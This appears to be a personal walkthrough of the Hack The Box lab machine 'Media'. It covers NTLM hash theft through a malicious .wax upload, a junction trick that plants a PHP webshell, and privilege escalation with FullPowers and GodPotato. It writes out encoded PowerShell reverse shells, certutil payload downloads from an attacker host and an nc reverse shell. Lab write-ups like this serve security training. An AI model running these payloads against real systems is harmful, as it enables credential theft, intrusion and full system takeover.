MEDIA (HTB) - JA Smith

# Lessons Learned - **When we see a `"we will get back to you shortly"` message associated with a file upload mechanism, assume that the uploaded file will be opened** - **Writable dir can be symlinked to a non-writable dir** - Then a file placed in the writable dir will be dumped into the non-writable one - `icacls` is great for checking perms in Windows - `nt authority\service account` should have `SeImpersonatePrivilege` by default - See [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account) - `FullPowers.exe` can be used to restore the full set of default privs for `nt authority\service account` - https://github.com/itm4n/FullPowers - `EnableAllTokenPrivs.ps1` can be used to enable all currently disabled privs - https://github.com/fashionproof/EnableAllTokenPrivs - https://medium.com/@markmotig/enable-all-token-privileges-a7d21b1a4a77 - We can feed a powershell revshell to a simple cmd type php webshell - The revshell maybe need to be base64 encoded and then the `powershell -e base64_blob` portion may need to be URL encoded - We could have also used webshell to upload an `msfvenom` payload, then used webshell to execute the payload to provide a revshell or meterpreter shell (depending on `msfvenom` payload) - `SeTcbPrivilege` is very much abusable - Next time, use: [CharminDoge/tcb-lpe: SeTcbPrivilege Local Privilege Escalation Exploit](https://github.com/CharminDoge/tcb-lpe) --- # After-Action Attack Sequence - File upload functionality wrt the Apache webserver - Upload an Windows Media Player compatible test file - Notice that someone will get back to use shortly; presume based on this that the file will be clicked on - Use `ntlm_theft.py` to generate a `.wax` file and upload - Listen for an NTLMv2 hash using `sudo resp -I tun0` - Crack NTLMv2 hash with `hashcat -m 5600` - Connect to the box with SSH as `enox` - Look over `review.ps1` available in `\users\enox\documents` - Review `httpd.conf` in `\xampp\apache\config` - Review `index.php` in `\xampp\htdocs` - Here we notice the files are being uploaded to `\windows\tasks\uploads` in a folder that is the md5 hash of the supplied `first_name.last_name.email` > `[[email protected]](mailto:[email protected])` = 44b85c98e94039c8a0a015f6d3a3449e - `enox` has RW access to `\windows\tasks` but not `\xampp\htdocs` - Clear out existing dir: `44b85c98e94039c8a0a015f6d3a3449e` in `\windows\tasks\uploads` - Create a symlink from `\windows\tasks\uploads\44b85c98e94039c8a0a015f6d3a3449e` to `\xampp\htdocs` - Upload a simple GET or REQUEST PHP webshell > `shell.php` - Confirm that our symlink caused the webshell to be dropped into `\xampp\htdocs` - Test webshell with `curl [http://meda.htb/shell.php?cmd=whoami`](http://meda.htb/shell.php?cmd=whoami) - Here we see that the webserver is running as `nt authority\local service` - According to [https://learn.microsoft.com/en-us/windows/win32/services/localservice-account](https://learn.microsoft.com/en-us/windows/win32/services/localservice-account), this account should have `SeImpersonatePrivilege` - Connect to the box as `nt authority\local service` - Feed the webshell a URL encoded command with a powershell revshell encoded as a base64 blob - Grab base64 powershell revshell from [revshells.com](http://revshells.com/) - Use following command: ` curl [http://media.htb/shell2.php?cmd=](http://media.htb/shell2.php?cmd=)"powershell%20-e%20[based64_blob]"` - From here, use `FullPowers.exe` to activate `SeImpersonatePrivilege` for `nt authority\local service` - We could also abuse `SeTcbPrivilege` - Connect to the box as `nt authority\system` - Use `GodPotato-NET4.exe` to open a revshell as `nt authority\system` --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260401144758.png]] - windows based on TTL - `nmap` scan - light ![[images/Pasted image 20260401144904.png]] - `nmap` scan - detailed ![[images/Pasted image 20260401145416.png]] - `nmap` scan - UDP ![[images/Pasted image 20260401145804.png]] --- # Service Enum ## Port 80 (HTTP): Apache 2.4.56; PHP 8.1.17 ### Initial review - Visit page ![[images/Pasted image 20260401145035.png]] - Not much to see here - view source ![[images/Pasted image 20260401151031.png]] - request:response in `burp` ![[images/Pasted image 20260401151149.png]] - Few names ![[images/Pasted image 20260401145214.png]] - File upload button may work? > asks for a video file (compatible with Windows Media Player) ![[images/Pasted image 20260401145200.png]] ### Web fuzzing - Try `feroxbuster` - `feroxbuster` uses `raft-medium` by default but this can be changed - this is a lot of output ```bash feroxbuster -u http://10.129.13.168 ``` ![[images/Pasted image 20260401150050.png]] - Directory fuzzing - `raft-medium` ![[images/Pasted image 20260401150339.png]] - `assets` shows the explorer for all images > nothing useful ![[images/Pasted image 20260401150713.png]] - `2.3-medium` > nothing new ![[images/Pasted image 20260401150920.png]] - Subdomain fuzzing - `top1million-20000` > nothing ![[images/Pasted image 20260401151513.png]] - VHost fuzzing - `top1million-20000` ### Other Checks - Try `index.html` > default 404 - Try `index.php` > drops us to home page - Try random page > default 404 ![[images/Pasted image 20260401150529.png]] - No `robots.txt` and no `sitemap.xml` - `whatweb` scan ![[images/Pasted image 20260401151410.png]] - `searchsploit` for apache and php version - nothing for `apache` 2.4.56 - php 8.1.17 may have an exploit? ![[images/Pasted image 20260401151856.png]] ### PHP 8.1.17 - Review `php/webapps/52047.py` - Associated with `CVE-2024-4577` ![[images/Pasted image 20260401152205.png]] - Takes URL and command arguments - Getting errors ![[images/Pasted image 20260401153057.png]] - Try different command > returns the home page ```bash python3 52047.py http://10.129.13.168 dir ``` ![[images/Pasted image 20260401153839.png]] - Try https://github.com/watchtowrlabs/CVE-2024-4577 - Getting errors regarding the command ```bash python exploit.py --target http://10.129.13.168/index.php -c "<?php system('calc');?>" ``` --- # File Upload Attack ## Attempt 1: Generate Custom AVI File with PHP Echo Test - Create a AVI file with the proper magic bytes that includes `<?php echo "Hello";?>` as a test - Use an online converter to convert hex `52 49 46 46 ?? ?? ?? ?? 41 56 49 20` to ASCII - View with `xxd` and check with `file` ![[images/Pasted image 20260401194957.png]] - Attempt to upload > recognized as an `.avi` ![[images/Pasted image 20260401195124.png]] - Looks like it was successful ![[images/Pasted image 20260401195155.png]] - view request:response in `burp` ![[images/Pasted image 20260401195616.png]] - Where was it uploaded? - Try again with `cmd` ![[images/Pasted image 20260401195818.png]] - Upload successful > try appending `?cmd=id` to root dir > nothing ![[images/Pasted image 20260401195956.png]] ## Attempt 2: Generate Custom WAX File with `ntlm_theft.py` - The alert indicated that someone will review and get back to us - We can presume that it will be opened on the webserver - Because we are targeting a Windows box maybe we can leak an NTLM hash - Use `ntlm_theft.py` from [Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)](https://github.com/Greenwolf/ntlm_theft) - Let's look at the options ![[images/Pasted image 20260401201510.png]] - There are only so many extension options: Which are compatible with Windows Media Player? - Looks like asx, wax, or m3u may work based on some googling as they are AV type files - Let's try `.wax` ![[images/Pasted image 20260401202533.png]] - Run `sudo responder -I tun0` and upload the `.wax` - Upload successful ![[images/Pasted image 20260401202635.png]] - And, we got an NTLM hash for `enox` ![[images/Pasted image 20260401202704.png]] - Looks like an NTLMv2 based on `hashid` ![[images/Pasted image 20260401202758.png]] - Attempt to crack with `hashcat -m 5600` - We have creds for `enox` ![[images/Pasted image 20260401203012.png]] --- # Foothold as `enox` ## Connect with RDP - Confirm creds with `nxc rdp` because port 3389 was open ![[images/Pasted image 20260401203413.png]] - This seems like it might be an old windows box - Having issues getting connecting with both `xfreerdp3` and `rdesktop` ![[images/Pasted image 20260401204802.png]] ![[images/Pasted image 20260401204742.png]] - Looks like it wants a Kerberos TGT. This is odd because we saw no signs of a DC like ports 88, 389, 636, 5985, etc. being open ## Connect with SSH - Also try creds with `nxc ssh` because port 22 was open ![[images/Pasted image 20260401204627.png]] - Let's SSH into the box with our creds for `enox` - We are in > not much to work with in terms of groups and privs ![[images/Pasted image 20260401205206.png]] - Browse docs accessible to `enox` - There is a script in `\users\enoc\documennts` entitled `review.ps1` ![[images/Pasted image 20260401211733.png]] - Since we know there was a webserver let's look at Apache's `httpd.conf` and PHP files - Navigate to `\xampp` ![[images/Pasted image 20260401210047.png]] - Navigate to `\xampp\apache\config` and `type httpd.conf` - Navigate to `\xampp\htdocs` to view PHP files - Type `index.php` ![[images/Pasted image 20260401210329.png]] - Upload dir = `\windows\tasks\uploads` where the folder name is an md5 hash of `first_name.last_name.email` - A bit odd that the upload loc is not in `\xampp\htdocs` or elsewhere in `\xampp` - Also this `todo.txt` may be linked to the script we found earlier - Move `WINPEAS.EXE` to box with `scp` ```bash scp /opt/winPEASx64.exe [email protected]:/users/enox/desktop/winpeas.exe ``` ![[images/Pasted image 20260401211354.png]] - Let's save output to a file and exfil for review on Kali ```powershell winpeas.exe > results.txt scp [email protected]:/users/enox/desktop/results.txt ~/Documents/htb/boxes/media/results.txt ``` - Oddest thing that jumped out at me ![[images/Pasted image 20260401213223.png]] ### Simple webshell by symlinking `\windows\tasks\uploads` to `\xampp\htdocs` - Confirm access to `\windows\tasks\uploads` ```powershell icacls "c:\windows\tasks\uploads" Get-Acl -path "c:\windows\tasks\uploads" | Format-Table -Wrap ``` ![[images/Pasted image 20260402182421.png]] - Clear out the md5 folder for `[email protected]` - Note the md5 hash: `44b85c98e94039c8a0a015f6d3a3449e` ![[images/Pasted image 20260402183645.png]] - Make a symlink to `\xampp\htdocs` and confirm ```powershell cmd /c mklink /J C:\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e C:\xampp\htdocs ls .\Windows\Tasks\Uploads\44b85c98e94039c8a0a015f6d3a3449e\ ``` ![[images/Pasted image 20260402183819.png]] ![[images/Pasted image 20260402183826.png]] - Now when we upload a simple php webshell as `shell2.php` it will be placed in `htdocs` and accessible from `\shell2.php?cmd=whoami` - Upload `shell2.php` ![[images/Pasted image 20260402184116.png]] - Check `\xampp\htdocs` ![[images/Pasted image 20260402184127.png]] - Now hit webshell - Works! ![[images/Pasted image 20260402184439.png]] - Let's use `curl` instead and URL encode `whoami /all` with `cyberchef.org` ![[images/Pasted image 20260402184526.png]] - As we see above, `nt authority\local service` has the `SeTcbPrivilege` privilege but it's disabled --- # Revshell for access as `nt authority\local service` ## Attempt 1: Discrete `revshelll.php` - Let's upload a php revshell ![[images/Pasted image 20260402193954.png]] - https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php - That uploaded to `htdocs` but did not hit the listener ## Attempt 2: Feed the original webshell a base64 encoded powershell command - Let's get a revshell by providing a base64 encoded powershell command as data to our webshell - Use `revshells.com` to generate the base54 blob ```bash curl http://media.htb/shell2.php --data-urlencode 'cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA' ``` - I'm getting a deprecation related error ![[images/Pasted image 20260402195855.png]] ## Attempt 3: Feed the original webshell a base64 encoded powershell command with URL encoding - Let's URL encode the portion associated with `"powershell -e [base64_blob]"` and retry with the below ```bash curl http://media.htb/shell2.php?cmd="powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" ``` - That worked! ![[images/Pasted image 20260402201144.png]] --- # Privesc - Let's find a way to enable `SeTcbprivilege` and abuse to privesc ## Attempt 1: `seTcb.exe` - https://github.com/mSameerMalik/SeTcbPrivilege_escalation/ ![[images/Pasted image 20260402201415.png]] - This tool also automatically enables the priv - First, move `seTcb.exe` to target - Note `service account` does not have access to `\windows\temp` or `users\public` but does have access to `\xampp` ```bash mkdir www && cd www wget https://github.com/mSameerMalik/SeTcbPrivilege_escalation/blob/main/seTcb.exe python3 -m http.server ``` ```powershell certutil.exe -urlcache -split -f http://10.10.14.197:8000/seTcb.exe \xampp\htdocs\setcb.exe ``` - Second, add `enox` to administrators group - Fails to add `enox` to administrators - Maybe we need to try a specify a service other than `group` ```powershell .\setcb.exe group "cmd /c net localgroup administrators enox /add" ``` ## Attempt 2: `TcbElevation-x64.exe` - https://github.com/b4lisong/SeTcbPrivilege-Abuse - looks like we need to enable the priv - First, enable `SeTcbPrivilege` with [fashionproof/EnableAllTokenPrivs](https://github.com/fashionproof/EnableAllTokenPrivs/tree/master) - Move to target and run > Enabled! ```powershell certutil.exe -urlcache -split -f http://10.10.14.197:8000/enablealltokenprivs.ps1 \xampp\htdocs\enableall.ps1 ``` ![[images/Pasted image 20260402204121.png]] - Second, download `TcbElevation-x64.exe` and `nc64.exe`, then move to target ![[images/Pasted image 20260402204455.png]] ```powershell certutil.exe -urlcache -split -f http://10.10.14.197:8000/nc64.exe \xampp\htdocs\nc64.exe certutil.exe -urlcache -split -f http://10.10.14.197:8000/TcbElevation-x64.exe \xampp\htdocs\TcbElevation-x64.exe ``` - Third, setup a listener on Kali and run the tool on the target as below ```powershell .\TcbElevation-x64.exe run54 "C:\Windows\system32\cmd.exe /c C:\xampp\htdocs\nc64.exe -e cmd 10.10.14.197 4445" ``` - Nothing on listener ![[images/Pasted image 20260402205448.png]] ## Attempt 3: Run `FullPowers.exe` for `SeImpersonatePrivilege`, then run `GodPotato.exe` - Download `fullpower.exe` and `GodPotato` on Kali ![[images/Pasted image 20260402211342.png]] - to check `.NET` version use below command ```cmd reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s ``` - Move to target with `certutil` ```powershell certutil.exe -urlcache -split -f http://10.10.14.197:8000/FullPowers.exe \xampp\htdocs\FullPowers.exe certutil.exe -urlcache -split -f http://10.10.14.197:8000/GodPotato-NET4.exe \xampp\htdocs\GodPotato-NET4.exe ``` ![[images/Pasted image 20260402211449.png]] - Run `fullpowers.exe` to create a revshell ```powershell .\FullPowers.exe -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" ``` - Now we have full powers ![[images/Pasted image 20260402211902.png]] - Run `GodPotato` for yet another revshell as below ```powershell .\GodPotato-NET4.exe -cmd "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQA5ADcAIgAsADgANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" ``` - There we go! ![[images/Pasted image 20260402213020.png]]